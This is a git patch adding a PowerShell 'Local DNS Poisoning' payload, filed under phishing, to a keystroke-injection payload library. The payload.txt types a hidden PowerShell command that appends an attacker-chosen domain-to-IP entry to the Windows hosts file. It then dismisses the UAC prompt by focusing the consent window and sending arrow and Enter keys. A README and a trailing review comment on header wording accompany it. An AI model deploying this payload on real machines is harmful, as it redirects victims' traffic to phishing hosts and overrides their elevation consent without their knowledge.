From e9916c88aad101c68b42faee1fe6dba59bb25f18 Mon Sep 17 00:00:00 2001
From: Ian Costa
Date: Mon, 11 Jan 2021 11:43:00 -0500
Subject: [PATCH] Windows Powershell Local DNS Poisoning payload (#427)

* Created Powershell_Local_DNS_Poisoning payload
* Fixed README.md formatting
---
 .../Powershell_Local_DNS_Poisoning/README.md | 20 +++++++
 .../payload.txt | 59 +++++++++++++++++++
 2 files changed, 79 insertions(+)
 create mode 100644 payloads/library/phishing/Powershell_Local_DNS_Poisoning/README.md
 create mode 100644 payloads/library/phishing/Powershell_Local_DNS_Poisoning/payload.txt

diff --git a/payloads/library/phishing/Powershell_Local_DNS_Poisoning/README.md b/payloads/library/phishing/Powershell_Local_DNS_Poisoning/README.md
new file mode 100644
index 00000000..82eae78a
--- /dev/null
+++ b/payloads/library/phishing/Powershell_Local_DNS_Poisoning/README.md
@@ -0,0 +1,20 @@
+# Hosts file DNS poisoning using Powershell
+
+## Description
+Redirects a given domain name to the target IP address. Uses the run prompt and Powershell to edit the hosts file, should work with any Windows version with those features but only tested on Windows 10.
+
+Change the variables under "options" in the setup stage before executing.
+
+## Options
+| Variable | Description |
+|-----------------|------------------------------------------|
+| poisoned_domain | This domain will point to the target IP |
+| target_ip | The IP that the domain should resolve to |
+
+## LED States
+| State | Color | Description |
+|--------|---------------------|-----------------------------------------|
+| SETUP | Magenta solid | Set attackmode and initialize variables |
+| STAGE1 | Yellow single blink | Modifying the hosts file |
+| STAGE2 | Yellow double blink | Bypassing UAC |
+| FINISH | Green solid | Script completed |
diff --git a/payloads/library/phishing/Powershell_Local_DNS_Poisoning/payload.txt b/payloads/library/phishing/Powershell_Local_DNS_Poisoning/payload.txt
new file mode 100644
index 00000000..20c2b214
--- /dev/null
+++ b/payloads/library/phishing/Powershell_Local_DNS_Poisoning/payload.txt
@@ -0,0 +1,59 @@
+#!/bin/bash
+##########################################################################
+# Title: Powershell Local DNS Poisoning
+# Description: Edits the hosts file to redirect an IP to a domain
+# Author: SammyTheBEAST
+# Version: 1
+# Category: Phishing
+# Target: Windows 10
+# Attackmode: HID
+#
+# Variables:
+# poisoned_domain: This domain will point to the target IP
+# target_ip: The IP that the domain should resolve to
+# LED States:
+# SETUP (Magenta solid): Set attackmode and initialize variables
+# STAGE1 (Yellow single blink): Modifying the hosts file
+# STAGE2 (Yellow double blink): Bypassing UAC
+# FINISH (Green solid): Script completed
+##########################################################################
+
+LED SETUP
+ATTACKMODE HID
+SET_LANGUAGE us
+
+# Options
+poisoned_domain="POISONED_DOMAIN"
+target_ip="TARGET_IP"
+
+
+##### Edit the hosts file #####
+LED STAGE1
+# Open the run prompt
+Q GUI r
+Q DELAY 500
+# Append a string to the hosts file
+Q STRING "powershell -noprofile -exec bypass -c \"Add-Content -Path \$Env:SystemRoot\System32\drivers\etc\hosts -Value '$target_ip $poisoned_domain'\""
+Q DELAY 50
+# Run as administrator
+Q CTRL-SHIFT ENTER
+Q DELAY 500
+
+
+##### Bypass UAC #####
+LED STAGE2
+# Attempt to bypass if window is already focused
+Q LEFTARROW
+Q DELAY 50
+Q ENTER
+# If the UAC window was not focused:
+# Run a powershell command to focus the window
+RUN WIN 'powershell -noprofile -exec bypass -c "(New-Object -ComObject WScript.Shell).AppActivate((get-process consent).MainWindowTitle)"'
+Q DELAY 500
+# Bypass once UAC window is focused
+Q LEFTARROW
+Q DELAY 50
+Q ENTER
+
+
+LED FINISH
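Review bot: The `# Description:` line in the payload header states the mapping backwards — "redirect an IP to a domain" — while the README in this same commit and the `-Value '$target_ip $poisoned_domain'` hosts entry map a domain name to an IP address. Suggest `# Description: Edits the hosts file to redirect a domain name to a given IP address` so the header agrees with the README's Options table. The `# Author:` line names SammyTheBEAST although the commit is authored by Ian Costa; if that is deliberate attribution it is fine, otherwise it should be reconciled. The header also documents no required-change step for the `POISONED_DOMAIN`/`TARGET_IP` placeholders, which the README does call out; a one-line `# Set the two Options below before deploying` comment above them would keep the two files consistent.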